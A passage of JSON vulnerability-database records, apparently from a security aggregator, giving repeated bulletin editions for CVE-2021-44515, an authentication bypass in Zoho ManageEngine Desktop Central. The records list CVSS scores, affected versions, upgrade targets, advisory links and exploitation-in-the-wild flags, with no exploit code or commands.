"https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-16T19:25:33", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 9}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T19:25:44", "history": [], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T19:25:44"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-16T19:25:44", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 10}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T19:55:33", "history": [], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T19:25:44"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-16T19:55:33", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 11}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T19:56:13", "history": [], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T19:56:13"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-16T19:56:13", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 12}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T20:25:33", "history": [], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T19:56:13"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-16T20:25:33", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 13}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", 